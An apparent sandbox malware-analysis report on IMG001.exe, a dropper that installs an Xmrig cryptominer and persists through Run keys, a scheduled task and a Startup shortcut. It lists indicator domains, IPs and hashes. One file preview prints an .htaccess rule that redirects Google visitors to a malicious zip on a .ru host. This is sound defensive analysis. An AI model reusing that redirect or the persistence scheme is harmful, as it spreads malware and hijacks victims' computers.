HDC Information:	Successful, ratio: 85.9% (good quality ratio 73.5%) Quality average: 71.3% Quality standard deviation: 36.3%
HCA Information:	Successful, ratio: 51% Number of executed functions: 57 Number of non-executed functions: 91
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, backgroundTaskHost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 168.61.161.212, 204.79.197.200, 13.107.21.200, 93.184.220.29, 52.147.198.201, 104.42.151.234, 104.43.193.48, 23.218.208.56, 20.82.209.104, 23.32.238.234, 23.32.238.177, 2.20.142.210, 2.20.142.209, 20.54.26.129 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, cs9.wac.phicdn.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:50:08	API Interceptor	22x Sleep call for process: IMG001.exe modified
04:50:24	Task Scheduler	Run new task: UAC path: C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe
04:50:26	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe
04:50:34	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe
04:50:42	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe
04:50:52	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
1.2.3.1	02ca4397da55b3175aaa1ad2c99981e792f66151.exe	Get hash	malicious	Browse
	IMG001.exe	Get hash	malicious	Browse
	Photo.exe	Get hash	malicious	Browse
	photo.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
hrtests.ru	02ca4397da55b3175aaa1ad2c99981e792f66151.exe	Get hash	malicious	Browse	37.1.216.8
	IMG001.exe	Get hash	malicious	Browse	37.1.216.8
	msk-c4262.exe	Get hash	malicious	Browse	37.1.216.8
	Photo.exe	Get hash	malicious	Browse	37.1.216.8
	photo.exe	Get hash	malicious	Browse	37.1.216.8
	Phot.exe	Get hash	malicious	Browse	37.1.216.8
	1.exe	Get hash	malicious	Browse	37.1.216.8
	Phot.exe	Get hash	malicious	Browse	37.1.216.8
	IMG00.exe	Get hash	malicious	Browse	37.1.216.8
	Phot.exe	Get hash	malicious	Browse	37.1.216.8
	382f2a05-f246-11e7-bb89-80e65024849.exe	Get hash	malicious	Browse	176.126.85.92
	02ca4397da55b3175aaa1ad2c99981e792f66151.exe	Get hash	malicious	Browse	37.1.216.8
	02ca4397da55b3175aaa1ad2c99981e792f66151.exe	Get hash	malicious	Browse	37.1.216.8
	IMG001.exe	Get hash	malicious	Browse	37.1.216.8
	02ca4397da55b3175aaa1ad2c99981e792f6615.exe	Get hash	malicious	Browse	37.1.216.8
	02ca4397da55b3175aaa1ad2c99981e792f6615.exe	Get hash	malicious	Browse	37.1.216.8
profetest.ru	02ca4397da55b3175aaa1ad2c99981e792f66151.exe	Get hash	malicious	Browse	1.2.3.1
	IMG001.exe	Get hash	malicious	Browse	1.2.3.1
	Photo.exe	Get hash	malicious	Browse	1.2.3.1
	photo.exe	Get hash	malicious	Browse	1.2.3.1
	Phot.exe	Get hash	malicious	Browse	37.1.216.8
	1.exe	Get hash	malicious	Browse	37.1.216.8
	Phot.exe	Get hash	malicious	Browse	37.1.216.8
	Phot.exe	Get hash	malicious	Browse	176.126.84.32
	382f2a05-f246-11e7-bb89-80e65024849.exe	Get hash	malicious	Browse	176.126.84.32
	02ca4397da55b3175aaa1ad2c99981e792f66151.exe	Get hash	malicious	Browse	37.1.216.8
	02ca4397da55b3175aaa1ad2c99981e792f66151.exe	Get hash	malicious	Browse	37.1.216.8
	02ca4397da55b3175aaa1ad2c99981e792f6615.exe	Get hash	malicious	Browse	37.1.216.8
	02ca4397da55b3175aaa1ad2c99981e792f6615.exe	Get hash	malicious	Browse	37.1.216.8
stafftest.ru	02ca4397da55b3175aaa1ad2c99981e792f66151.exe	Get hash	malicious	Browse	255.255.0.0
	IMG001.exe	Get hash	malicious	Browse	255.255.0.0
	msk-c4262.exe	Get hash	malicious	Browse	255.255.0.0
	Photo.exe	Get hash	malicious	Browse	255.255.0.0
	photo.exe	Get hash	malicious	Browse	255.255.0.0
	Phot.exe	Get hash	malicious	Browse	255.255.0.0
	1.exe	Get hash	malicious	Browse	255.255.0.0
	Phot.exe	Get hash	malicious	Browse	255.255.0.0
	IMG001.exe	Get hash	malicious	Browse	37.1.216.8
	IMG00.exe	Get hash	malicious	Browse	188.214.30.158
	Phot.exe	Get hash	malicious	Browse	188.214.30.158
	IMG00.exe	Get hash	malicious	Browse	176.126.84.24
	Phot.exe	Get hash	malicious	Browse	176.126.84.24
	Ke.exe	Get hash	malicious	Browse	176.126.84.24
	382f2a05-f246-11e7-bb89-80e65024849.exe	Get hash	malicious	Browse	176.126.84.24
	02ca4397da55b3175aaa1ad2c99981e792f66151.exe	Get hash	malicious	Browse	255.255.0.0
	02ca4397da55b3175aaa1ad2c99981e792f66151.exe	Get hash	malicious	Browse	255.255.0.0
	IMG001.exe	Get hash	malicious	Browse	255.255.0.0
	02ca4397da55b3175aaa1ad2c99981e792f6615.exe	Get hash	malicious	Browse	255.255.0.0
	02ca4397da55b3175aaa1ad2c99981e792f6615.exe	Get hash	malicious	Browse	255.255.0.0

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AKAMAI-ASUS	pasteCounterArray.dll	Get hash	malicious	Browse	23.57.80.37
	1.dll	Get hash	malicious	Browse	92.122.146.68
	9R5WtLGEAy.dll	Get hash	malicious	Browse	2.22.155.145
	NXGtOsH8WS	Get hash	malicious	Browse	2.20.214.243
	#Ud83d#Udcde.htm	Get hash	malicious	Browse	2.20.214.243
	2730.sh	Get hash	malicious	Browse	2.20.214.243
	msals.pumpl.dll	Get hash	malicious	Browse	2.22.155.145
	606d810b8ff92.pdf.dll	Get hash	malicious	Browse	2.22.155.145
	DropDll.dll	Get hash	malicious	Browse	23.57.80.37
	msals.pumpl.dll	Get hash	malicious	Browse	184.30.24.22
	nnrlOwKZlc.exe	Get hash	malicious	Browse	184.30.20.56
	145440a7c1067bacfcd4d07078040b67c3753e589501b.dll	Get hash	malicious	Browse	96.16.108.27
	PJ1OTtgIlo.dll	Get hash	malicious	Browse	104.79.88.129
	4BRIjOEYNf.dll	Get hash	malicious	Browse	104.80.28.24
	LCoqf24H7e.dll	Get hash	malicious	Browse	184.30.24.22
	ACHWIREPAYMENTINFORMATION.xlsx	Get hash	malicious	Browse	104.83.87.109
	BsFMy70EjG.dll	Get hash	malicious	Browse	2.22.155.145
	k9NSoUT2pd.dll	Get hash	malicious	Browse	2.22.155.145
	NocSbjtb9r.exe	Get hash	malicious	Browse	104.83.121.112
	redwirespace-invoice-982323_xls.HtMl	Get hash	malicious	Browse	23.211.149.25
MIT-GATEWAYSUS	YPJ9DZYIpO	Get hash	malicious	Browse	19.160.35.138
	FB11.exe	Get hash	malicious	Browse	128.31.0.34
	messg_02620000_deupx - Copy.exe	Get hash	malicious	Browse	128.31.0.39
	HUahIwV82u.exe	Get hash	malicious	Browse	128.31.0.34
	R8WWx5t2RE.dll	Get hash	malicious	Browse	18.41.89.186
	KCCAfipQl2.dll	Get hash	malicious	Browse	19.3.169.121
	fOMSAB0Sfe.exe	Get hash	malicious	Browse	128.31.0.34
	530000.exe	Get hash	malicious	Browse	128.31.0.34
	networkmanager	Get hash	malicious	Browse	19.211.36.11
	DocuSign_139380140_1184163298.xls	Get hash	malicious	Browse	18.67.216.238
	wEcncyxrEe	Get hash	malicious	Browse	18.161.47.0
	mozi.a.zip	Get hash	malicious	Browse	19.214.106.48
	hse8DRMQnI.exe	Get hash	malicious	Browse	128.31.0.39
	6729001591617.exe	Get hash	malicious	Browse	128.31.0.34
	FickerStealer.exe	Get hash	malicious	Browse	18.27.197.252
	WUHU95Apq3	Get hash	malicious	Browse	19.188.31.158
	bin.sh	Get hash	malicious	Browse	18.83.153.48
	oHqMFmPndx.exe	Get hash	malicious	Browse	19.196.77.88
	mssecsvc.exe	Get hash	malicious	Browse	18.25.154.248
	i	Get hash	malicious	Browse	18.172.254.74
COLOGUS	http://creationskateboards.com/satori_wheels_spencer_hamilton/WRLUbPer/	Get hash	malicious	Browse	64.118.88.4
DNIC-ASBLK-01534-01546US	Order#2334.exe	Get hash	malicious	Browse	55.154.4.71
	QUOTATION REQUEST.exe	Get hash	malicious	Browse	55.154.4.71
	wEcncyxrEe	Get hash	malicious	Browse	55.175.150.8
	mssecsvc.exe	Get hash	malicious	Browse	55.208.202.33
	mssecsvr.exe	Get hash	malicious	Browse	55.132.211.39
	rJz6SePuqu.dll	Get hash	malicious	Browse	158.3.79.134

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\nsxD347.tmp\inetc.dll	Click HERE to start the WebExplorer Browser Installer_49807x_.exe	Get hash	malicious	Browse
	click here to start the file launcher by webnavigator installer_zg9ld3is_.exe	Get hash	malicious	Browse
	VID001.exe	Get hash	malicious	Browse
	IMG001.exe	Get hash	malicious	Browse
	DOC001.exe	Get hash	malicious	Browse
	DOC001 (3).exe	Get hash	malicious	Browse
	msk-c4262.exe	Get hash	malicious	Browse
	https://download.wbxhub.com:443/cgi/adk/chrdl.cgi?wb_id=35781x-0F&iid=Webexplorer	Get hash	malicious	Browse
	pollev.exe	Get hash	malicious	Browse
	vkKtumBK1e.exe	Get hash	malicious	Browse
	Install JDownloader.exe	Get hash	malicious	Browse
	IMG001.exe	Get hash	malicious	Browse
	IMG00.exe	Get hash	malicious	Browse
	IMG00.exe	Get hash	malicious	Browse
	4Ma5bh2gFj.exe	Get hash	malicious	Browse
	Ke.exe	Get hash	malicious	Browse
	VID001.exe	Get hash	malicious	Browse
	VID001.exe	Get hash	malicious	Browse
	image.exe	Get hash	malicious	Browse
	IMG001.exe	Get hash	malicious	Browse

Created / dropped Files

C:\IMG001.exe Download File
Process:	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	71035300
Entropy (8bit):	7.995318027560144
Encrypted:	true
SSDEEP:	1572864:dMIMIMIMIMIMIMIMIMIMIMIMIMIMIMIMIMIMIMIMO:u///////////////////O
MD5:	052C50E6E2D4CE0D9CDB04EFFEB55367
SHA1:	7512CE1FFD417B25AA92EE4C452D966295A87941
SHA-256:	9E35D403DD038E55A08B39FBD39B9326D2B997A436DD794B1D57EEAFA4D3E822
SHA-512:	AB92CC28AA073BD251A9C5CFB1B8DEF3054933840A1239098FCF101BEDDC292CBF9FA3EBC53824E93F4CA14E40F171FFA10FE0D0D6531E27E3E0A19037705A77
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<...x..x..x.....z..x........i..,.t.....y..Richx..................PE..L......K.................\....;.. ...0.......p....@..........................`A..............................................s.......`@..............................................................................p...............................text...,Z.......\.................. ..`.rdata.......p.......`..............@..@.data.....;..........r..............@....ndata.......`<..........................rsrc........`@......v..............@..@........................................................................................................................................................................................................................................................................................................................................................

C:\IMG001.exe:P Download File
Process:	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.9979526986606913
Encrypted:	false
SSDEEP:	3:EKnovYQcvn:ETAJn
MD5:	81A94C129CC398FA97D0221A9F02004E
SHA1:	F30CE6FBA4141970E8C620525EE4E111E65E7AA6
SHA-256:	52F130105D1A14E05840269397C0504127BA7A3FBCE33BE734EB2CE4C2CB95CE
SHA-512:	BC6A0E3D76EEF01496C91B946BEF092BBA22F805A385A3B1226507BF77D176B32AD05A65CD74E386CBA0477F38CE9DF023AB0C4EE0003C12FFFBA4DA2DB2306B
Malicious:	true
Preview:	[Section1] ..p=0 1..nul ..

C:\IMG001.exe:Zone.Identifier Download File
Process:	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	520
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	6:rPY9PY9PY9PY9PY9PY9PY9PY9PY9PY9PY9PY9PY9PY9PY9PY9PY9PY9PY9PYV:n
MD5:	14311DA22655C21F15A96E499E7DE1CE
SHA1:	7D8950B19582FBDC518381DAF8CFDA7F70F9F019
SHA-256:	8DA67C716DAACCF6AF67058CAF1F5E83D7DF92308F159FDEB5B555390F57F8A1
SHA-512:	FCFFE4652EFD8624AD166B2EA6A1A02E398C487B6844E9A6499F99623B56307EEC530DAEF50C528302F3CC56A337CA77F9B8C4BD23EBE0C55B498E109979EB3C
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\.htaccess Download File
Process:	C:\Users\user\AppData\Local\Temp\tftp.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	114
Entropy (8bit):	4.977143800702649
Encrypted:	false
SSDEEP:	3:nXMREhKcv3nMRgAt3QCKQMRjJg3Rz3AKLXQKL0/ovn:XXDvMQSSJoZnXQKIgvn
MD5:	1CD7834FB975E468FCCC8F027F69A528
SHA1:	56275EEF952E6559B86A2CBA0B9D45B0307F9DAE
SHA-256:	72E847A89D6A5E9E779EA2F6347B8780C0C0D72969F43777AA7CEB431BD3B024
SHA-512:	14E5FDC4EE4D961F1DA2272847D31DDD1559A36415F00A032AE71400956D897DBD88FD8C8D03AADAD29888E729D5C5077D8620AEC8E179440B0D5DCE511F3338
Malicious:	false
Preview:	RewriteEngine on..RewriteCond %{HTTP_REFERER} ^(.)google\.(.)..RewriteRule .* http://testswork.ru/info.zip [L]..

C:\Users\user\AppData\Local\Temp\info.zip Download File
Process:	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	1068
Entropy (8bit):	7.690275133404956
Encrypted:	false
SSDEEP:	24:91mVy6UwvwrBg4o+xu9f2vyHwKmKuuuD5hioildx8R:91mOOwrBg8gUydU
MD5:	8604E0F263922501F749CFCA447B041A
SHA1:	85C712BDEACEB78E2785E1F63811B0C4A50F952D
SHA-256:	52EC3BA075A507E62BB6E3272FB13B30A8DDC0F62C4EA194311D558B338EB5ED
SHA-512:	496D7A1B8B55D28387DAD3F1C43E164BB567259C4CAC21DD632CCD450DFBF28D431330C27EA72A5A8034979C325D19FF3FD8A3F7FC12B1122F67EF595630D5B2
Malicious:	false
Preview:	PK.........wGm:.....".......info.vbeMT.H.....z[......J.R.:..s.dQ..@m.?...J6.3...l..3=.....s5"...w<....P..DE?.u@:.F......H.}AuI(.p..4z....JN.......H.E[....\...)...G`...7.y.L]R'"...D..r...-.e...[.5..\.....P....Kv.3....F.$.u..(.....Tm@.K...].A...}.-dn........V.4.....[.m....E....1\....B..}...u8....P.{..~.K...../)..`e.._x.3.>.........x.4.w...O....NTL..n.}.=3).........V..}X.2.......c..&.\|...e...^..q..V.......z..8.o........kd......A.!..ux...j-....@5.-...kF...y.....{P..1..T...~.h2....5a..l.y.`.S.\|;.X.v..........5e+.F....-.^Z8.].......H..1yF.".......?Z/..V..%-.{'B.=+3.8.+G...i..>..8bM....O #..m.Wu....2..:...).Y_..O..s..h.t.y:...h_U.4(\.v...;..%.#>v....2.._....C.)...&.9.."4.G..U..+E.....-.....f2..).,t`.Lm_I.F.t.;..84.2s..Vp..'....l....-dn....k......\.vQ.{d.C.../..zgVt.]..).......4.0...z0.w.....).H.w.d.6.v..^o..zg..>_.Jr. .7.Q.x.6q.D,1.4$..Y.'.<Vi..#..l...^.r..z.<Mr...-=.`..KV.]......2.r.F.n..P..Z..*7{ -].[..6...z.4.r........NIo..1.".?..PK......

C:\Users\user\AppData\Local\Temp\nsxD347.tmp\inetc.dll Download File
Process:	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.709686220138167
Encrypted:	false
SSDEEP:	384:oW4gLK82JvtosNCPhXKJ18hcEP1+f+pvMPbkdTg1Zahzs60Ac9khYLMkIX0+Gbyk:oW4i/2JloB5IQ9AhkwZaKRu
MD5:	D7A3FA6A6C738B4A3C40D5602AF20B08
SHA1:	34FC75D97F640609CB6CADB001DA2CB2C0B3538A
SHA-256:	67EFF17C53A78C8EC9A28F392B9BB93DF3E74F96F6ECD87A333A482C36546B3E
SHA-512:	75CF123448567806BE5F852EBF70F398DA881E89994B82442A1F4BC6799894E799F979F5AB1CC9BA12617E48620E6C34F71E23259DA498DA37354E5FD3C0F934
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:	Filename: Click HERE to start the WebExplorer Browser Installer_49807x_.exe, Detection: malicious, Browse Filename: click here to start the file launcher by webnavigator installer_zg9ld3is_.exe, Detection: malicious, Browse Filename: VID001.exe, Detection: malicious, Browse Filename: IMG001.exe, Detection: malicious, Browse Filename: DOC001.exe, Detection: malicious, Browse Filename: DOC001 (3).exe, Detection: malicious, Browse Filename: msk-c4262.exe, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: pollev.exe, Detection: malicious, Browse Filename: vkKtumBK1e.exe, Detection: malicious, Browse Filename: Install JDownloader.exe, Detection: malicious, Browse Filename: IMG001.exe, Detection: malicious, Browse Filename: IMG00.exe, Detection: malicious, Browse Filename: IMG00.exe, Detection: malicious, Browse Filename: 4Ma5bh2gFj.exe, Detection: malicious, Browse Filename: Ke.exe, Detection: malicious, Browse Filename: VID001.exe, Detection: malicious, Browse Filename: VID001.exe, Detection: malicious, Browse Filename: image.exe, Detection: malicious, Browse Filename: IMG001.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9.W.X...X...X...X...X.../Y..X..../..X.......X....*..X....)..X....,..X..Rich.X..........PE..L......S...........!.....,...\......./.......@............................................@..........................K..l...pD..d...............................L....................................................@..P............................text....+.......,.................. ..`.rdata.......@.......0..............@..@.data...<<...P.......<..............@....rsrc................D..............@..@.reloc..n............N..............@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tftp.exe Download File
Process:	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	93184
Entropy (8bit):	6.085590187107592
Encrypted:	false
SSDEEP:	1536:kvPW2y3HnJ8txqqLbR6wHaoev4IWu3GI7UnS:Uy3J8iqnRmUnS
MD5:	C80D5BBD7F47398B9530A7968FF07FE3
SHA1:	8B2D7C3F299A9FEEACC87F3AB2CAAE09C133BB06
SHA-256:	1D9E2F10196BA34F3B7C5CC6E24C306FB401F8C63EA122FBC6D2C448226C576F
SHA-512:	9D43D52DF684EC8EC5CED577C07AF79B3728C5CB76FE0951F8B1C5727CE27B214C6628A36A595A5038AD97DC99F13AA72367124F4E521407D163620016E2A592
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 43%, Browse Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....BlV....................h...L...........@....@........................................... ......................................................................................................................................................text....).........................`.P`.data...D....@......................@.`..rdata...%...P...&...2..............@.`@.eh_fram.............X..............@.0@.bss....LK............................`..idata...............\..............@.0..CRT.................h..............@.0..tls.... ............j..............@.0.................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.lnk Download File
Process:	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Wed Apr 14 10:50:08 2021, mtime=Wed Apr 14 10:50:09 2021, atime=Wed Apr 14 10:49:57 2021, length=3551765, window=hide
Category:	dropped
Size (bytes):	947
Entropy (8bit):	4.957421929483094
Encrypted:	false
SSDEEP:	24:8miQg7+8ozrmeKlMP2PGAhy3I2tVMepm:8mHgq8SiplMP2P9husep
MD5:	3502E64134C98DBB281CA4D897411765
SHA1:	8C8A9F2CD8226D3F7666F4BE30ADEC6A374E84BB
SHA-256:	F70732AFDDD17195EDA760C6E9961F47D45CE88F220881A06436E3B39D4AEC0C
SHA-512:	E1408D45C4438A3964B57E84018AA7EA30FAD489EA65AF51B9BB5AF99949EBD5AFBC65D644947427BDDF21B62FE79350DD9C4970A0A5380B9A994C0AF2EF1664
Malicious:	false
Preview:	L..................F.... ....U.Q$1....IR$1...h.K$1...26.......................:..DG..Yr?.D..U..k0.&...&...........-..94x.:......R$1......t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny..R9^.....Y....................f.(.A.p.p.D.a.t.a...B.V.1......RE^..Roaming.@.......Ny..RE^.....Y.....................3..R.o.a.m.i.n.g.....V.1......RK^..NsMiner.@......RE^.RL^.....R.....................'(.N.s.M.i.n.e.r.....`.2..26..R=^ .IMG001.exe..F......RE^.RE^....l\.....................N..I.M.G.0.0.1...e.x.e.......`...............-......._...........:.`\|.....C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe..!.....\.....\.....\.....\.....\.N.s.M.i.n.e.r.\.I.M.G.0.0.1...e.x.e.&.C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.N.s.M.i.n.e.r.`.......X.......675052...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.E.......9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............

C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe Download File
Process:	C:\Users\user\Desktop\IMG001.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	3551765
Entropy (8bit):	7.995318027560144
Encrypted:	true
SSDEEP:	98304:MKVPnq1y5tQOM33ZNqCtBixHl54Oyjes1boR:dVPq1yLanrqTr43eS+
MD5:	62E3FDCEC6EED38E01571716A25D4547
SHA1:	01EF02B0ABCA86168EE0A61BF6CC155319B22A66
SHA-256:	C096A0169583F4088A3FCFA26AC5AD6C91FEE5FA247E0543A688F2F0C429091D
SHA-512:	C51826AA5DE77D138B9D2B596002B308881FB6B9825FF54DD019CCA1DAF68307BEBF97C08767B72BBB1EC4FBED62E0D12291473B3C19629A5012B34A06D83E9E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 55%, Browse Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<...x..x..x.....z..x........i..,.t.....y..Richx..................PE..L......K.................\....;.. ...0.......p....@..........................`A..............................................s.......`@..............................................................................p...............................text...,Z.......\.................. ..`.rdata.......p.......`..............@..@.data.....;..........r..............@....ndata.......`<..........................rsrc........`@......v..............@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe:P Download File
Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	52
Entropy (8bit):	3.9979526986606913
Encrypted:	false
SSDEEP:	3:EKnovYQcv+2AbKnovYQcvn:ETAJJ+TAJn
MD5:	7C454269BFB837464E4FAF0FC2FDE98A
SHA1:	BE1E7246B5BFF93A4B9BE3920D859618B12A68E0
SHA-256:	29E75B3D0AC470F3A40A48232A43E2CB80EBCA2FAB02F0F31D7BE258F3124B1A
SHA-512:	E5C0F31DDAD69FCFA4D3FC6CB1160EF136DC220A966D12D5B798601C3107C8ECB10B280F22605DDE3DFAA8CE8B4E2F792AD72CE8BB01BD0B0111F1F48C326DFD
Malicious:	true
Preview:	[Section1] ..p=0 1..nul ..[Section1] ..p=0 1..nul ..

C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\IMG001.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\NsMiner\NsCpuCNMiner32.exe Download File
Process:	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1433600
Entropy (8bit):	7.930238763466199
Encrypted:	false
SSDEEP:	24576:gWKqa4hnzP3w7L3rmZmpk7FSQFW2iJ+N07/TwYV1CdZdQ+4lT+iFgiGTtswAtdz:gSrwf3aZmpOFU2iQNIUc1LxGTtswgd
MD5:	3AFEB8E9AF02A33FF71BF2F6751CAE3A
SHA1:	FD358CFE41C7AA3AA9E4CF62F832D8AE6BAA8107
SHA-256:	A0EBA3FDA0D7B22A5D694105EC700DF7C7012DDC4AE611C3071EF858E2C69F08
SHA-512:	11A2C12D7384D2743D25B9E28FC4EA0C3E2771ACA92875FD3350F457DF66C66827D175F67108F1A56D958F3B1163F3A89EEDB8919BF7973D037241A1E59231D5
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Roaming\NsMiner\NsCpuCNMiner32.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 86%, Browse Antivirus: ReversingLabs, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>R..z3..z3..z3...2.x3...8._3..DL.s3..z3..3....:.p3...:..3...;.3....&.`3....<.{3....9.{3..Richz3..................PE..L......S............................U.$...........@...........................4...........@.........................t<%.P.....4.......4.\|....................p4......Z4.8.....................$.$....Z4.@............P3.D............................text............................... ..`.rdata...s..........................@..@.data...$...........................@....tls.........p......................@....vmp0...............................`....vmp1...............................`....reloc.......p4.....................@..@.rsrc...\|.....4.....................@..@........................................................................................................................................................................................

C:\Users\user\AppData\Roaming\NsMiner\NsCpuCNMiner64.exe Download File
Process:	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1563136
Entropy (8bit):	7.929913248218093
Encrypted:	false
SSDEEP:	24576:Mf79KQimeoyEgM8dSGDeCAQ4GYwEkYEDI3BiiVzKJo23bvH5xh8wtDzgClYAdC51:b3EciPG9E/LBVeJo2Vsw57lYAA51
MD5:	EEDB9D86AE8ABC65FA7AC7C6323D4E8F
SHA1:	CE1FBF382E89146EA5A22AE551B68198C45F40E4
